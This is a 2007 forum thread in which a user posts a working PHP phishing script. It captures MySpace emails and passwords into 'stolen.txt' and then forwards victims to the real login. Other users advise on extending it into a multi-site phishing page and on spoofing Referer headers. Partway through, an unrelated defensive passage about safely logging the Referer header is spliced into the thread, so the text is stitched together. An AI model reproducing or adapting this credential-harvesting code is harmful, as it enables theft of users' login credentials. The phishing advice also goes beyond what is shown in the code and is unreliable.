Nubs + PHP



Snowe
09-14-2007, 04:14 PM
argh, is there any way to get a php to send me ip, password and username/email without having to edit it for each individual site?

This is what I currently use for MySpace...


<?php

if(isset($_POST["email"]) && isset($_POST["password"]))
{
$userEmail = $_POST["email"];
$userPassword = $_POST["password"];
$referer = $_SERVER["HTTP_REFERER"];
$ipAddress= $_SERVER["REMOTE_ADDR"];
$logLine = "
Email: $userEmail
Password: $userPassword
IP address: $ipAddress
Referrer: $referer
";

if(!$logHandle = fopen("stolen.txt", "a"))
{
print("Can't open the file. Exiting...");
exit(0);
}

if(!fwrite($logHandle, $logLine))
{
print("Couldn't write to the file. Exiting...");
exit(0);
}

fclose($logHandle);
print("
<html>
<head>
</head>
<body>
<form method=\"post\" action=\"http://login.myspace.com/index.cfm?fuseaction=login.process\" id=\"myspace_form\">
<input name=\"Login\" type=\"hidden\" value=\"" . $_POST["Login"] . "\" />
<input name=\"email\" type=\"hidden\" value=\"" . $_POST["email"] . "\" />
<input name=\"password\" type=\"hidden\" value=\"" . $_POST["password"] . "\" />
<input name=\"Remember\" type=\"hidden\" value=\"" . $_POST["Remember"] . "\" />
</form>
<script type=\"text/javascript\">
document.getElementById(\"myspace_form\").submit();
</script>
</body>
</html>
");
}

?>

Is there any way to make it so it can "theoretically" work with multiple sites? facebook, myspace and yahoo for example?

SyntaXmasteR
09-14-2007, 04:52 PM
First thought... you are just BEGGING to get hacked! You do not validate any of your data!

VALIDATE your DATA!

Anyways you can tweak your code to grab the website from the referrer inside a switch statement:



<?
function find_redirect($referrer){

if($preg_match('/^myspace^/',$referrer){
return(*);
}else if($preg_match('/^facebook^/',$referrer){
return(2);
}
}

switch(find_redirect($_SERVER["HTTP_REFERER"])){
case *:
// DO THIS FOR MYSPACE
break;

case 2:
// DO THIS FOR FACEBOOK
break
}

?>

Ezekiel
09-15-2007, 05:46 AM
Syntax's idea of a multi-purpose phishing page would be the best solution, but you would need a good PHP knowledge in order to adapt it for all the different POST variables and possible redirections for each site.

Really, you'd need that knowledge in order to change your script, whatever method you choose to use. Websites are way too varied in so many ways for a catch-all phishing script to be written -- they have different form input names, for example.

I guess you could make a script that writes the entire POST array to a text file then redirects to Google (or the referrer), but that isn't a great way of accomplishing this.

Whatever you do, you'd still need to modify the HTML file of each individual website so the form's action parameter is set to the URL of your phishing script.

Snowe
09-16-2007, 10:43 PM
I sorta just gave up on the whole "catch-all" phishing idea... decided to just make one for each site... it's much easier, and since I know very little about php, html, scripting, etc... it's probably the best way to go, learn a bit about each site and how they work, learn a bit how things would change/need to be changed...

Thanks though.

SyntaXmasteR
09-16-2007, 10:53 PM
Can anyone give a working example of how to send a fake referrer URL using php? I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can be manipulated.

If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.

Ezekiel
09-17-2007, 03:09 AM
> Can anyone give a working example of how to send a fake referrer URL using php? I've read a few, but they do not work. Microsoft (UK) was hacked because of this, and now I store all of my referrer information in Base64 knowing it can be manipulated.
>
> If anyone has this information please post it! Sending a custom header via php. That would be a great tutorial if anyone knows enough about it.

To the best of my knowledge, that's impossible. Referrer headers are generated by the browser and can't be interfered with by the server.

For example, you can redirect someone with this:


<?php
// A redirect is sent with the Location header (Host is a request header).
header("Location: http://www.google.com/redirected.php");
exit;
?>

Or with a meta tag redirect, but they will always send the referrer of the URL they came from.

The only possible way I can see this happening would be if an XSS vulnerability was discovered on the target referrer site, then people given links which insert code to exploit the vulnerability and redirect them from this site to the destination.

SyntaXmasteR
09-17-2007, 09:16 AM
The referrer url can be completely spoofed. That's why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how? :mad:

A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privileges.
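
The concern in the post above, a Referer value reaching a database, applies to any site that logs the header, because the client chooses what it contains. An added example, not part of the thread: storing the header through a bound parameter and escaping it on display; the `hits` table, the 2048-byte cap and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example (not from the thread): log the Referer header as untrusted data.
// Table/column names and the 2048-byte cap are assumptions for illustration.
function normalize_referer(?string $raw): ?string
{
    if ($raw === null || $raw === '' || strlen($raw) > 2048) {
        return null;                      // absent or oversized: store NULL
    }
    if (preg_match('/[\x00-\x1F\x7F]/', $raw)) {
        return null;                      // control characters (log/header injection)
    }
    $scheme = parse_url($raw, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return null;                      // only web URLs are meaningful here
    }
    return $raw;                          // well-formed, but still untrusted
}

function log_hit(PDO $db, string $ip, ?string $referer): void
{
    // Bound parameters keep the value out of the SQL text entirely.
    $stmt = $db->prepare('INSERT INTO hits (ip, referer) VALUES (:ip, :referer)');
    $stmt->execute([':ip' => $ip, ':referer' => normalize_referer($referer)]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE hits (id INTEGER PRIMARY KEY, ip TEXT, referer TEXT)');

// Constructed sample requests; the second carries SQL metacharacters.
$samples = [
    ['203.0.113.5', 'https://example.test/page'],
    ['203.0.113.6', "http://example.test/?q=x'); DROP TABLE hits;--"],
    ['203.0.113.7', 'javascript:alert(1)'],
    ['203.0.113.8', null],
];
foreach ($samples as [$ip, $ref]) {
    log_hit($db, $ip, $ref);
}

// Escape on output too: the stored value is displayed, never interpreted.
foreach ($db->query('SELECT ip, referer FROM hits') as $row) {
    $shown = htmlspecialchars($row['referer'] ?? '(none)', ENT_QUOTES, 'UTF-8');
    printf("%s  %s\n", $row['ip'], $shown);
}
```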

Ezekiel
09-19-2007, 04:20 PM
> The referrer url can be completely spoofed. That's why modules for IE give the referrer "None of your business". You can create headers in php, and send the fake headers to a url. My problem is I do not know how? :mad:
>
> A hacker sent fake referrers to Microsoft. Microsoft evidently saves referrers in a database in plain text. This referrer url hijacked the database giving the hacker full privileges.

I thought you were talking about forcing users' browsers to visit a different website with a spoofed referrer.

When making the request yourself, it's easy. All you have to do is make a standard HTTP request with your desired referrer.

See the PHP sockets page for info on how to do this in PHP:

http://www.php.net/sockets

It could be done with telnet, if you wanted to bypass programming altogether.

Moonbat
09-19-2007, 05:20 PM
Or just use the refspoof extension for Firefox :D